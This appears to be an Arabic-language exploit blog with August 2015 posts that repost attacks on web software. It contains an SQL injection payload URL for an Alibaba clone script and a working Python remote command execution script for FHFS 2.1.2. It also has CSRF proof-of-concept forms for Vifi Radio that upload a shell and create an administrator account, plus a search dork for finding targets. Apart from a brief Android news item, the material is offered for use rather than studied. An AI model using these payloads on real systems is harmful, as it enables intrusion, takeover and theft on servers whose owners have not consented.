الاثنين، 31 أغسطس 2015

Alibaba Clone B2B Script Sql Injection Vulnerability

Alibaba Clone B2B Script

 Sql Injection Vulnerability

Description:
# Exploit Title: Alibaba Clone B2B Script Sql Injection All Versions 
# Date: 2015-08-31 
# Exploit Author: Meisam Monsef meisamrce
# Vendor Homepage: http://www.superbscripts.com/ 
# Version: All Versions 
# Tested on: CentOS and Windows 

POC:
/contactuser.html?es_type=4&es_id=

EXPLOIT:
http://site.com/contactuser.html?es_type=4&es_id=-9999+[sql+command]+%23


DEMO:


الجمعة، 28 أغسطس 2015

Seowonintech Rooters all device remote root exploit

SEOWONINTECH ALL DEVICE REMOTE ROOT EXPLOIT

Exploit:
http://www.exploit4arab.net/exploits/1701

FHFS Server 2.1.2 Remote Exploit اختراق سورفر

FHFS - FTP/HTTP File Server 2.1.2 Remote Exploit

اختراق سورفر
FHFS - FTP/HTTP SERVER 2.1.2
REMOTE COMMAND EXECUTION EXPLOIT


Exploit:
#!/usr/bin/python
#
# FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution
#
# Author: Naser Farhadi
#
# Date: 26 August 2015 # Version: 2.1.2 # Tested on: Windows 7 SP1 (32 bit)
#
#
# Description : FHFS is a FTP and HTTP Web Server package,
#               transparently based on HFS and FileZilla. FHFS is built to act as an all-in-one user-based file hosting website,
#               good for schools, businesses, etc. whose students/employees need to easily transport files.
# Usage:
#       chmod +x FHFS.py
#       ./FHFS.py
##
  
import socket
  
url = raw_input("Enter URL : ")
try:
      while True:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((url, 80))
            cmd = raw_input("Enter command (E.g. calc) or press Ctrl+C to exit : ")
            req = "GET /?{.exec|"+cmd+".}"
            req += " HTTP/1.1\r\n\r\n"
            sock.send(req)
            sock.close()
            print "Done!"
except KeyboardInterrupt:
      print "Bye!"


الخميس، 27 أغسطس 2015

الاثنين، 24 أغسطس 2015

ثغرات جديدة على اجهزة الاندرويد

ثغرات جديدة على اجهزة الاندرويد


ثغرات جديدة على اجهزة الاندرويد تم اكتشافها (CVE-2015-3842) 
تسمح باختراق جهازك و سرقة كل المعلومات بم فيها 
البيانات و المعلومات الخاصة و حتى الرسائل 
و قد اشار المحققون انه بالامكان حتى اجراء المكالمات
: للمزيد من المعلومات

http://thehackernews.com/2015/08/hacking-android-smartphones.html




السبت، 22 أغسطس 2015

Vifi Radio v1 - CSRF Vulnerability

Vifi Radio v1 - CSRF Vulnerability

############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Vifi Radio
|~Affected Version : v1
|~Official Demo :  http://radyo.vifibilisim.com
|~RISK : Medium
|~DORK : inurl:index.asp?radyo=2
|~Tested On : [L] Windows 7, Mozilla Firefox
########################################################

Upload.HTML

----------------------------------------------------------- 

<td width="796" valign="top"><form name="form1" method="post" action="http://[TARGET]/yonetim/djtek_yukle.asp?upload=true&haber=56" enctype="multipart/form-data" onSubmit="checkFileUpload(this,'GIF,JPG,JPEG,BMP,PNG');return document.MM_returnValue">

<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td class="baslik"> CSRF with Tamper Data Shell Upload PoC </td>
</tr> <tr>
<td height="125" align="center" class="menu"><input type="file" name="fmfile" style="width:200px" class="main">
<input name="fmsubmit" type="submit" class="main" value="Y&Uuml;KLE" /></td>
                         
</tr></table></form></td></tr></table></td></tr> 
----------------------------------------------------------
 PoC
----------------------------------------------------------
<html>
  <body>
    <form action="http://[TARGET]/yonetim/kullanici-kaydet.asp?tur=g" method="POST">
      <input type="hidden" name="rutbe" value="1" />
      <input type="hidden" name="djadi" value="0" />
      <input type="hidden" name="resim" value="Vifi+Bili%FEim" />
      <input type="hidden" name="firma" value="USERNAME" />
      <input type="hidden" name="link" value="PASSWORD" />
      <input type="hidden" name="sira" value="23" />
      <input type="hidden" name="ilet" value="G%D6NDER" />
      <input type="hidden" name="Submit" value="Exploit!" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
############################
"Admin Panel: /yonetim "
############################
EXPLOIT: http://0day.today/exploit/24101